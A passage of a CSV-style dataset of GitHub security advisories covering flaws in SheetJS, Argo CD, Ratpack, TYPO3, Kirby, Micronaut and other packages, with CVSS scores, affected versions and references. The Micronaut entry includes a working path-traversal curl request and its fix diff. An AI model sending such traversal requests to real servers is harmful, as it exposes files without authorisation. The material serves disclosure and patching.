'nvd_published_at': '2021-06-29T17:15:00Z'}" +1.4.0,GHSA-g973-978j-2c3p,2022-02-08T21:02:26Z,2021-07-22T19:47:15Z,,['CVE-2021-32014'],Denial of Service in SheetJS Pro,SheetJS Pro through 0.16.9 allows attackers to cause a denial of service (CPU consumption) via a crafted .xlsx document that is mishandled when read by xlsx.js.,"[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H'}]","[{'package': {'ecosystem': 'npm', 'name': 'xlsx'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '0.17.0'}]}]}, {'package': {'ecosystem': 'Maven', 'name': 'org.webjars.npm:xlsx'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '0.17.0'}]}]}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2021-32014'}, {'type': 'WEB', 'url': 'https://floqast.com/engineering-blog/post/fuzzing-and-parsing-securely/'}, {'type': 'WEB', 'url': 'https://sheetjs.com/pro'}, {'type': 'WEB', 'url': 'https://www.npmjs.com/package/xlsx/v/0.17.0'}, {'type': 'WEB', 'url': 'https://www.oracle.com/security-alerts/cpujan2022.html'}]","{'cwe_ids': ['CWE-345', 'CWE-400'], 'severity': 'MODERATE', 'github_reviewed': True, 'github_reviewed_at': '2021-07-19T21:44:42Z', 'nvd_published_at': '2021-07-19T14:15:00Z'}" +1.4.0,GHSA-h8jc-jmrf-9h8f,2023-09-25T17:30:03Z,2021-07-26T21:19:27Z,,['CVE-2020-8828'],Argo CD Insecure default administrative password,"In Argo CD versions 1.8.0 and prior, the default admin password is set to the argocd-server pod name. For insiders with access to the cluster or logs, this issue could be abused for privilege escalation, as Argo has privileged roles. A malicious insider is the most realistic threat, but pod names are not meant to be kept secret and could wind up just about anywhere. + +#### Workaround: + +The recommended mitigation as described in the user documentation is to use SSO integration. The default admin password should only be used for initial configuration and then [disabled](https://argo-cd.readthedocs.io/en/stable/operator-manual/user-management/#disable-admin-user) or at least changed to a more secure password.","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H'}]","[{'package': {'ecosystem': 'Go', 'name': 'github.com/argoproj/argo-cd'}, 'ecosystem_specific': {'affected_functions': ['']}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'last_affected': '1.8.0'}]}]}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2020-8828'}, {'type': 'WEB', 'url': 'https://argo-cd.readthedocs.io/en/stable/security_considerations/#cve-2020-8828-insecure-default-administrative-password'}, {'type': 'WEB', 'url': 'https://argoproj.github.io/argo-cd/security_considerations/'}, {'type': 'PACKAGE', 'url': 'https://github.com/argoproj/argo-cd'}, {'type': 'WEB', 'url': 'https://github.com/argoproj/argo-cd/blob/129cf5370f9e2c6f99c9a5515099250a7ba42099/docs/security_considerations.md#cve-2020-8828---insecure-default-administrative-password'}, {'type': 'WEB', 'url': 'https://github.com/argoproj/argo/releases'}, {'type': 'WEB', 'url': 'https://www.soluble.ai/blog/argo-cves-2020'}]","{'cwe_ids': ['CWE-1188', 'CWE-287'], 'severity': 'HIGH', 'github_reviewed': True, 'github_reviewed_at': '2021-07-26T21:14:45Z', 'nvd_published_at': '2020-04-08T20:15:00Z'}" +1.4.0,GHSA-2cc5-23r7-vc4v,2022-08-11T00:17:56Z,2021-07-01T17:02:26Z,,['CVE-2021-29480'],Ratpack's default client side session signing key is highly predictable,"### Impact + +The client side session module uses the application startup time as the signing key by default. This means that if an attacker can determine this time, and if encryption is not also used (which is recommended, but is not on by default), the session data could be tampered with by someone with the ability to write cookies. + +The default configuration is unsuitable for production use as an application restart renders all sessions invalid and is not multi-host compatible, but its use is not actively prevented. + +### Vulnerability Location + +https://github.com/ratpack/ratpack/blob/29434f7ac6fd4b36a4495429b70f4c8163100332/ratpack-session/src/main/java/ratpack/session/clientside/ClientSideSessionConfig.java#L29 + +### Patches + +As of Ratpack 1.9.0 the default value is a securely randomly generated value, generated at application startup time. + +### Workarounds + +Supply an alternative signing key, as per the documentation's recommendation. +","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:N'}]","[{'package': {'ecosystem': 'Maven', 'name': 'io.ratpack:ratpack-session'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '1.9.0'}]}]}]","[{'type': 'WEB', 'url': 'https://github.com/ratpack/ratpack/security/advisories/GHSA-2cc5-23r7-vc4v'}, {'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2021-29480'}, {'type': 'PACKAGE', 'url': 'https://github.com/ratpack/ratpack'}, {'type': 'WEB', 'url': 'https://github.com/ratpack/ratpack/blob/29434f7ac6fd4b36a4495429b70f4c8163100332/ratpack-session/src/main/java/ratpack/session/clientside/ClientSideSessionConfig.java#L29'}]","{'cwe_ids': ['CWE-330', 'CWE-340'], 'severity': 'MODERATE', 'github_reviewed': True, 'github_reviewed_at': '2021-06-30T17:49:41Z', 'nvd_published_at': '2021-06-29T19:15:00Z'}" +1.4.0,GHSA-gmr7-m73x-6c9q,2021-07-26T21:11:19Z,2021-07-26T21:22:13Z,,['CVE-2020-11671'],Missing Authorization in TeamPass,Lack of authorization controls in REST API functions in TeamPass through 2.1.27.36 allows any TeamPass user with a valid API token to become a TeamPass administrator and read/modify all passwords via authenticated api/index.php REST API calls. NOTE: the API is not available by default.,"[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:N'}]","[{'package': {'ecosystem': 'Packagist', 'name': 'nilsteampassnet/teampass'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'last_affected': '2.1.27.36'}]}]}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2020-11671'}, {'type': 'WEB', 'url': 'https://github.com/nilsteampassnet/TeamPass/issues/2765'}]","{'cwe_ids': ['CWE-862'], 'severity': 'HIGH', 'github_reviewed': True, 'github_reviewed_at': '2021-07-26T21:11:19Z', 'nvd_published_at': '2020-05-04T14:15:00Z'}" +1.4.0,GHSA-7j34-xq9v-9mqg,2021-07-27T14:36:16Z,2021-07-28T18:56:52Z,,['CVE-2020-0827'],Out-of-bounds write in ChakraCore,"A remote code execution vulnerability exists in the way that the ChakraCore scripting engine handles objects in memory, aka 'Scripting Engine Memory Corruption Vulnerability'. This CVE ID is unique from CVE-2020-0768, CVE-2020-0823, CVE-2020-0825, CVE-2020-0826, CVE-2020-0828, CVE-2020-0829, CVE-2020-0830, CVE-2020-0831, CVE-2020-0832, CVE-2020-0833, CVE-2020-0848.","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:H/PR:N/UI:R/S:U/C:H/I:H/A:H'}]","[{'package': {'ecosystem': 'NuGet', 'name': 'Microsoft.ChakraCore'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '1.11.17'}]}]}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2020-0827'}, {'type': 'WEB', 'url': 'https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-0827'}]","{'cwe_ids': ['CWE-787'], 'severity': 'HIGH', 'github_reviewed': True, 'github_reviewed_at': '2021-07-27T14:36:16Z', 'nvd_published_at': '2020-03-12T16:15:00Z'}" +1.4.0,GHSA-6mh3-j5r5-2379,2021-08-31T21:22:46Z,2021-07-22T19:36:58Z,,['CVE-2021-32668'],Cross-Site Scripting in Query Generator & Query View,"> ### Meta +> * CVSS: `CVSS:3.1/AV:N/AC:L/PR:H/UI:R/S:C/C:L/I:L/A:N/E:F/RL:O/RC:C` (4.5) + +### Problem +Failing to properly encode error messages, the components _QueryGenerator_ and _QueryView_ are vulnerable to both reflected and persistent cross-site scripting. A valid backend user account having administrator privileges is needed to exploit this vulnerability. + +### Solution +Update to TYPO3 versions 8.7.41 ELTS, 9.5.28, 10.4.18, 11.3.1 that fix the problem described. + +### Credits +Thanks to Richie Lee who reported this issue and to TYPO3 security team member Oliver Hader who fixed the issue. + +### References +* [TYPO3-CORE-SA-2021-010](https://typo3.org/security/advisory/typo3-core-sa-2021-010)","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:H/PR:L/UI:R/S:U/C:H/I:H/A:N'}]","[{'package': {'ecosystem': 'Packagist', 'name': 'typo3/cms-core'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '8.0.0'}, {'fixed': '8.7.41'}]}]}, {'package': {'ecosystem': 'Packagist', 'name': 'typo3/cms-core'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '9.0.0'}, {'fixed': '9.5.28'}]}]}, {'package': {'ecosystem': 'Packagist', 'name': 'typo3/cms-core'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '10.0.0'}, {'fixed': '10.4.18'}]}]}, {'package': {'ecosystem': 'Packagist', 'name': 'typo3/cms-core'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '11.0.0'}, {'fixed': '11.3.1'}]}], 'database_specific': {'last_known_affected_version_range': '< 11.3.0'}}]","[{'type': 'WEB', 'url': 'https://github.com/TYPO3/TYPO3.CMS/security/advisories/GHSA-6mh3-j5r5-2379'}, {'type': 'WEB', 'url': 'https://github.com/TYPO3/typo3/security/advisories/GHSA-6mh3-j5r5-2379'}, {'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2021-32668'}, {'type': 'PACKAGE', 'url': 'https://github.com/TYPO3/typo3'}, {'type': 'WEB', 'url': 'https://typo3.org/security/advisory/typo3-core-sa-2021-010'}]","{'cwe_ids': ['CWE-79'], 'severity': 'MODERATE', 'github_reviewed': True, 'github_reviewed_at': '2021-07-20T17:42:11Z', 'nvd_published_at': '2021-07-20T15:15:00Z'}" +1.4.0,GHSA-8h2g-r292-j8xh,2022-08-11T20:43:23Z,2021-07-19T21:21:12Z,,['CVE-2021-36213'],HashiCorp Consul L7 deny intention results in an allow action,"In HashiCorp Consul before 1.10.1 (and Consul Enterprise), xds can generate a situation where a single L7 deny intention (with a default deny policy) results in an allow action.","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N'}]","[{'package': {'ecosystem': 'Go', 'name': 'github.com/hashicorp/consul'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '1.10.1'}]}]}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2021-36213'}, {'type': 'WEB', 'url': 'https://discuss.hashicorp.com/t/hcsec-2021-16-consul-s-application-aware-intentions-deny-action-fails-open-when-combined-with-default-deny-policy/26855'}, {'type': 'PACKAGE', 'url': 'https://github.com/hashicorp/consul/'}, {'type': 'WEB', 'url': 'https://github.com/hashicorp/consul/releases/tag/v1.10.1'}, {'type': 'WEB', 'url': 'https://security.gentoo.org/glsa/202208-09'}, {'type': 'WEB', 'url': 'https://www.hashicorp.com/blog/category/consul'}]","{'cwe_ids': [], 'severity': 'HIGH', 'github_reviewed': True, 'github_reviewed_at': '2021-07-19T17:33:14Z', 'nvd_published_at': '2021-07-17T18:15:00Z'}" +1.4.0,GHSA-2f2w-349x-vrqm,2023-04-14T19:24:30Z,2021-07-02T19:18:43Z,,['CVE-2021-32735'],Cross-site scripting (XSS) from field and configuration text displayed in the Panel,"On Saturday, @hdodov reported that the Panel's `ListItem` component (used in the pages and files section for example) displayed HTML in page titles as it is. This could be used for cross-site scripting (XSS) attacks. + +We used his report as an opportunity to find and fix XSS issues related to dynamic site content throughout the Panel codebase. + +### Impact + +Cross-site scripting (XSS) is a type of vulnerability that allows to execute any kind of JavaScript code inside the Panel session of other users. In the Panel, a harmful script can for example trigger requests to Kirby's API with the permissions of the victim. + +Such vulnerabilities are critical if you might have potential attackers in your group of authenticated Panel users. They can escalate their privileges if they get access to the Panel session of an admin user. Depending on your site, other JavaScript-powered attacks are possible. + +Visitors without Panel access can only use this attack vector if your site allows changing site data from a frontend form (for example user self-registration or the creation of pages from a contact or other frontend form). If you validate or sanitize the provided form data, you are already protected against such attacks by external visitors. + +### Patches + +[Kirby 3.5.7](https://github.com/getkirby/kirby/releases/tag/3.5.7) contains patches for the following issues we found during our investigation: + +- Some translated error and info messages contain placeholders to dynamically insert information like page titles or filenames. While the translation strings are allowed to contain HTML formatting, the dynamic data needs to be protected against XSS attacks. Kirby 3.5.7 now escapes the dynamic data. +- Our `Box` component used to display information for the user supports HTML output for specific use-cases. We found out that the dialogs used in the `files`, `pages` and `users` fields as well as the `fields` section used it to display raw exception or error messages. These messages are now escaped. +- The users and settings views display user and language data using the `ListItem` component that supports HTML. We now escape the dynamic data before it is passed to the `ListItem` component. +- Some of our sections and fields support HTML for their `text`, `help` and/or `info` properties. This allows custom formatting from the blueprint, but also caused the original issue reported to us that allowed to inject HTML code from the content itself. Kirby 3.5.7 now escapes the default `text` displayed by the `files` and `pages` sections (filename/page title), the `files`, `pages` and `users` fields (filename/page title/username) and by query-based `checkboxes`, `radio`, `tags` and `multiselect` fields (default text depending on the used query). + +**Note:** Custom `text`, `help` and `info` queries in blueprints are *not* escaped in 3.5.7. We support HTML in these properties because there are valid use-cases for custom formatting. However there can still be XSS vulnerabilities depending on your use of these properties. In Kirby 3.6 we will provide a new feature that will make it much easier to control whether you want to allow HTML from query placeholders.","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:L/A:N'}]","[{'package': {'ecosystem': 'Packagist', 'name': 'getkirby/cms'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '3.5.7'}]}], 'database_specific': {'last_known_affected_version_range': '<= 3.5.6'}}]","[{'type': 'WEB', 'url': 'https://github.com/getkirby/kirby/security/advisories/GHSA-2f2w-349x-vrqm'}, {'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2021-32735'}, {'type': 'WEB', 'url': 'https://github.com/getkirby/kirby/commit/f5ead62f8510158bed5baf58ca0e851875778a09'}, {'type': 'PACKAGE', 'url': 'https://github.com/getkirby/kirby'}, {'type': 'WEB', 'url': 'https://github.com/getkirby/kirby/releases/tag/3.5.7'}]","{'cwe_ids': ['CWE-80'], 'severity': 'HIGH', 'github_reviewed': True, 'github_reviewed_at': '2021-07-02T16:38:10Z', 'nvd_published_at': '2021-07-02T15:15:00Z'}" +1.4.0,GHSA-xcqr-9h24-vrgw,2021-07-26T21:13:31Z,2021-07-26T21:19:37Z,,['CVE-2020-8827'],Improper Restriction of Excessive Authentication Attempts in Argo API,"As of v1.5.0, the Argo API does not implement anti-automation measures such as rate limiting, account lockouts, or other anti-bruteforce measures. Attackers can submit an unlimited number of authentication attempts without consequence.","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N'}]","[{'package': {'ecosystem': 'Go', 'name': 'github.com/argoproj/argo-cd/util/cache'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '1.5.1'}]}]}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2020-8827'}, {'type': 'WEB', 'url': 'https://github.com/argoproj/argo-cd/pull/3369'}, {'type': 'WEB', 'url': 'https://github.com/argoproj/argo-cd/pull/3404'}, {'type': 'WEB', 'url': 'https://github.com/argoproj/argo-cd/commit/35a7350b7444bcaf53ee0bb11b9d8e3ae4b717a1'}, {'type': 'WEB', 'url': 'https://argoproj.github.io/argo-cd/operator-manual/user-management/#disable-admin-user'}, {'type': 'WEB', 'url': 'https://argoproj.github.io/argo-cd/security_considerations/'}, {'type': 'WEB', 'url': 'https://github.com/argoproj/argo/releases'}, {'type': 'WEB', 'url': 'https://www.soluble.ai/blog/argo-cves-2020'}]","{'cwe_ids': ['CWE-307'], 'severity': 'HIGH', 'github_reviewed': True, 'github_reviewed_at': '2021-07-26T21:13:31Z', 'nvd_published_at': '2020-04-08T20:15:00Z'}" +1.4.0,GHSA-cjx7-399x-p2rj,2021-07-28T15:37:18Z,2021-07-26T21:15:08Z,,['CVE-2021-32769'],Improper Limitation of a Pathname to a Restricted Directory ('Path Traversal') in micronaut-core,"With a basic configuration like + +```yaml +router: + static-resources: + assets: + enabled: true + mapping: /.assets/public/** + paths: file:/home/lstrmiska/test/ +``` + +it is possible to access any file from a filesystem, using ""/../../"" in URL, as Micronaut does not restrict file access to configured paths. + +**Repro Steps** +- create a file test.txt in /home/lstrmiska +- start micronaut +- execute command +`curl -v --path-as-is ""http://localhost:8080/.assets/public/../test.txt""` + + +### Impact + +Micronaut can potentially leak sensitive information. + +See https://cwe.mitre.org/data/definitions/22.html + +### Patches + +``` +diff --git a/core/src/main/java/io/micronaut/core/io/file/DefaultFileSystemResourceLoader.java b/core/src/main/java/io/micronaut/core/io/file/DefaultFileSystemResourceLoader.java +index 2f5a91403..19d3b7f05 100644 +--- a/core/src/main/java/io/micronaut/core/io/file/DefaultFileSystemResourceLoader.java ++++ b/core/src/main/java/io/micronaut/core/io/file/DefaultFileSystemResourceLoader.java +@@ -69,6 +69,9 @@ public class DefaultFileSystemResourceLoader implements FileSystemResourceLoader + @Override + public Optional getResourceAsStream(String path) { + Path filePath = getFilePath(normalize(path)); ++ if (pathOutsideBase(filePath)) { ++ return Optional.empty(); ++ } + try { + return Optional.of(Files.newInputStream(filePath)); + } catch (IOException e) { +@@ -79,7 +82,7 @@ public class DefaultFileSystemResourceLoader implements FileSystemResourceLoader + @Override + public Optional getResource(String path) { + Path filePath = getFilePath(normalize(path)); +- if (Files.exists(filePath) && Files.isReadable(filePath) && !Files.isDirectory(filePath)) { ++ if (!pathOutsideBase(filePath) && Files.exists(filePath) && Files.isReadable(filePath) && !Files.isDirectory(filePath)) { + try { + URL url = filePath.toUri().toURL(); + return Optional.of(url); +@@ -117,4 +120,15 @@ public class DefaultFileSystemResourceLoader implements FileSystemResourceLoader + private Path getFilePath(String path) { + return baseDirPath.map(dir -> dir.resolve(path)).orElseGet(() -> Paths.get(path)); + } ++ ++ private boolean pathOutsideBase(Path path) { ++ if (baseDirPath.isPresent()) { ++ Path baseDir = baseDirPath.get(); ++ if (path.isAbsolute() == baseDir.isAbsolute()) { ++ Path relativePath = baseDir.relativize(path); ++ return relativePath.startsWith(""..""); ++ } ++ } ++ return false; ++ } + } +-- + +``` + +### Workarounds + +- do not use ** in mapping, use only * which exposes only flat structure of a directory not allowing traversal +- run micronaut in chroot (linux only) + +### References + +See https://cwe.mitre.org/data/definitions/22.html + +### For more information +If you have any questions or comments about this advisory: +* Open an issue in [Github](https://github.com/micronaut-projects/micronaut-core/issues) +* Email us at [info@micronaut.io](mailto:info@micronaut.io) +","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N'}]","[{'package': {'ecosystem': 'Maven', 'name': 'io.micronaut:micronaut-http-server-netty'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '2.5.9'}]}]}]","[{'type': 'WEB', 'url': 'https://github.com/micronaut-projects/micronaut-core/security/advisories/GHSA-cjx7-399x-p2rj'}, {'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2021-32769'}, {'type': 'WEB', 'url': 'https://github.com/micronaut-projects/micronaut-core/commit/a0cfeb13bf1ef5d692d16d4a3b91b34b7456bb11'}]","{'cwe_ids': ['CWE-22'], 'severity': 'HIGH', 'github_reviewed': True, 'github_reviewed_at': '2021-07-22T20:25:11Z', 'nvd_published_at': '2021-07-16T19:15:00Z'}" +1.4.0,GHSA-gm2x-6475-g9r8,2021-07-13T14:57:56Z,2021-07-02T18:32:18Z,,['CVE-2021-32737'],XSS Injection in Media Collection Title was possible,"### Impact + +A logged in admin user was possible to add a script injection (XSS) in the collection title which was executed. + +### Workarounds + +Manual patching the js files. + +### For more information + +If you have any questions or comments about this advisory:' + + - Email us at [security@sulu.io](mailto:security@sulu.io) +","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:H/UI:R/S:C/C:L/I:L/A:N'}]","[{'package': {'ecosystem': 'Packagist', 'name': 'sulu/sulu'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '1.6.41'}]}]}]","[{'type': 'WEB', 'url': 'https://github.com/sulu/sulu/security/advisories/GHSA-gm2x-6475-g9r8'}, {'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2021-32737'}, {'type': 'WEB', 'url': 'https://github.com/sulu/sulu/releases/tag/1.6.41'}]","{'cwe_ids': ['CWE-79'], 'severity': 'MODERATE', 'github_reviewed': True, 'github_reviewed_at': '2021-07-02T18:03:48Z', 'nvd_published_at': '2021-07-02T18:15:00Z'}" +1.4.0,GHSA-rgcm-rpq9-9cgr,2021-07-27T15:13:34Z,2021-07-28T17:57:09Z,,['CVE-2020-7964'],Missing Authentication for Critical Function in Saleor,"An issue was discovered in Mirumee Saleor 2.x before 2.9.1. Incorrect access control in the checkoutCustomerAttach mutations allows attackers to attach their checkouts to any user ID and consequently leak user data (e.g., name, address, and previous orders of any other customer).","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N'}]","[{'package': {'ecosystem': 'PyPI', 'name': 'saleor'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '2.0.0'}, {'fixed': '2.9.1'}]}]}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2020-7964'}, {'type': 'WEB', 'url': 'https://github.com/mirumee/saleor/commit/233b8890c60fa6d90daf99e4d90fea85867732c3'}, {'type': 'WEB', 'url': 'https://github.com/mirumee/saleor/releases/tag/2.9.1'}]","{'cwe_ids': ['CWE-306'], 'severity': 'MODERATE', 'github_reviewed': True, 'github_reviewed_at': '2021-07-27T15:13:34Z', 'nvd_published_at': '2020-01-24T20:15:00Z'}" +1.4.0,GHSA-m738-3rc4-5xv3,2021-07-02T16:44:24Z,2021-07-02T19:19:31Z,,['CVE-2021-32729'],A user without PR can reset user authentication failures information,"### Impact +The script service method used to reset the authentication failures record can be executed by any user with Script rights and does not require Programming rights as it should have. +Note that being able to reset the authentication failure record mean that an attacker with script right might use it to try performing a bruteforce attack since she'd been able to virtually deactivate the mechanism introduced to mitigate those attacks. + +### Patches +The problem has been patched in version 12.6.8, 12.10.4 and 13.0. + +### Workarounds +There's no workaround besides upgrading and being careful on which user should have Script right access. Note that any bruteforce attack on the authentication should be visible in the logs since the authentication failures are logged. + +### References +https://jira.xwiki.org/browse/XWIKI-18276 + +### For more information +If you have any questions or comments about this advisory: +* Open an issue in [Jira](http://jira.xwiki.org) +* Email us at [the security mailing-list](mailto:security@xwiki.org) +","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:H/PR:H/UI:R/S:U/C:N/I:L/A:N'}]","[{'package': {'ecosystem': 'Maven', 'name': 'org.xwiki.platform:xwiki-platform-security-authentication-script'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '11.6'}, {'fixed': '12.6.8'}]}]}, {'package': {'ecosystem': 'Maven', 'name': 'org.xwiki.platform:xwiki-platform-security-authentication-script'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '12.7'}, {'fixed': '12.10.4'}]}]}]","[{'type': 'WEB', 'url': 'https://github.com/xwiki/xwiki-platform/security/advisories/GHSA-m738-3rc4-5xv3'}, {'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2021-32729'}, {'type': 'WEB', 'url': 'https://jira.xwiki.org/browse/XWIKI-18276'}]","{'cwe_ids': ['CWE-287', 'CWE-693', 'CWE-732'], 'severity': 'LOW', 'github_reviewed': True, 'github_reviewed_at': '2021-07-02T16:44:24Z', 'nvd_published_at': '2021-07-01T17:15:00Z'}" +1.4.0,GHSA-rqjw-p5vr-c695,2021-07-28T15:18:01Z,2021-07-19T15:21:41Z,,['CVE-2021-32770'],Basic-auth app bundle credential exposure in gatsby-source-wordpress,"### Impact +The gatsby-source-wordpress plugin prior to versions 4.0.8 and 5.9.2 leaks .htaccess HTTP Basic Authentication variables into the app.js bundle during build-time. Users who are not initializing basic authentication credentials in the gatsby-config.js are not affected. + +Example affected gatsby-config.js: +``` + resolve: 'gatsby-source-wordpress', + auth: { + htaccess: { + username: leaked_username + password: leaked_password, + }, + }, +``` + +### Patches +A patch has been introduced in gatsby-source-wordpress@4.0.8 and gatsby-source-wordpress@5.9.2 which mitigates the issue by filtering all variables specified in the `auth: { }` section. Users that depend on this functionality are advised to upgrade to the latest release of gatsby-source-wordpress, run `gatsby clean` followed by a `gatsby build`. + + +### Workarounds +There is no known workaround at this time, other than manually editing the app.js file post-build. + + +### For more information +Email us at [security@gatsbyjs.com](mailto:security@gatsbyjs.com)","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N'}]","[{'package': {'ecosystem': 'npm', 'name': 'gatsby-source-wordpress'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '4.0.8'}]}]}, {'package': {'ecosystem': 'npm', 'name': 'gatsby-source-wordpress'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '5.0.0'}, {'fixed': '5.9.2'}]}]}]","[{'type': 'WEB', 'url': 'https://github.com/gatsbyjs/gatsby/security/advisories/GHSA-rqjw-p5vr-c695'}, {'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2021-32770'}]","{'cwe_ids': ['CWE-200', 'CWE-522'], 'severity': 'HIGH', 'github_reviewed': True, 'github_reviewed_at': '2021-07-15T20:28:20Z', 'nvd_published_at': '2021-07-15T19:15:00Z'}" +1.4.0,GHSA-8vcr-vxm8-293m,2022-02-08T21:02:07Z,2021-07-22T19:48:13Z,,['CVE-2021-32013'],Denial of Service in SheetsJS Pro,SheetJS Pro through 0.16.9 allows attackers to cause a denial of service (memory consumption) via a crafted .xlsx document that is mishandled when read by xlsx.js (issue 2 of 2).,"[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H'}]","[{'package': {'ecosystem': 'npm', 'name': 'xlsx'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '0.17.0'}]}]}, {'package': {'ecosystem': 'Maven', 'name': 'org.webjars.npm:xlsx'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '0.17.0'}]}]}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2021-32013'}, {'type': 'WEB', 'url': 'https://floqast.com/engineering-blog/post/fuzzing-and-parsing-securely/'}, {'type': 'WEB', 'url': 'https://sheetjs.com/pro'}, {'type': 'WEB', 'url': 'https://www.npmjs.com/package/xlsx/v/0.17.0'}, {'type': 'WEB', 'url': 'https://www.oracle.com/security-alerts/cpujan2022.html'}]","{'cwe_ids': ['CWE-400'], 'severity': 'MODERATE', 'github_reviewed': True, 'github_reviewed_at': '2021-07-19T21:41:18Z', 'nvd_published_at': '2021-07-19T14:15:00Z'}" +1.4.0,GHSA-vr5m-3h59-7jcp,2022-05-26T19:57:25Z,2021-07-01T17:01:59Z,,['CVE-2021-32736'],Prototype Pollution in think-helper,"### Impact + +The software receives input from an upstream component that specifies attributes that are to be initialized or updated in an object, but it does not properly control modifications of attributes of the object prototype. + +### Patches + +`think-helper@1.1.3` patched it, anyone used `think-helper` should upgrade to `>=1.1.3` version. + +### References + +https://cwe.mitre.org/data/definitions/1321.html + +### For more information +If you have any questions or comments about this advisory: +* Open an issue in [thinkjs/thinkjs](https://github.com/thinkjs/thinkjs) +* Email us at [i@imnerd.org](mailto:i@imnerd.org) +","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N'}]","[{'package': {'ecosystem': 'npm', 'name': 'think-helper'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '1.1.3'}]}]}]","[{'type': 'WEB', 'url': 'https://github.com/thinkjs/think-helper/security/advisories/GHSA-vr5m-3h59-7jcp'}, {'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2021-32736'}, {'type': 'PACKAGE', 'url': 'https://github.com/thinkjs/think-helper'}]","{'cwe_ids': ['CWE-1321', 'CWE-915'], 'severity': 'HIGH', 'github_reviewed': True, 'github_reviewed_at': '2021-06-30T17:40:38Z', 'nvd_published_at': '2021-06-30T18:15:00Z'}" +1.4.0,GHSA-hc33-32vw-rpp9,2021-10-21T14:14:24Z,2021-07-01T17:01:16Z,,['CVE-2021-29485'],Remote Code Execution Vulnerability in Session Storage,"### Impact + +A malicious attacker can achieve Remote Code Execution (RCE) via a maliciously crafted Java deserialization gadget chain leveraged against the Ratpack session store. + +If your application does not use Ratpack's session mechanism, it is not vulnerable. + +### Details + +Attackers with the ability to write to session data, can potentially craft payloads that deserialize 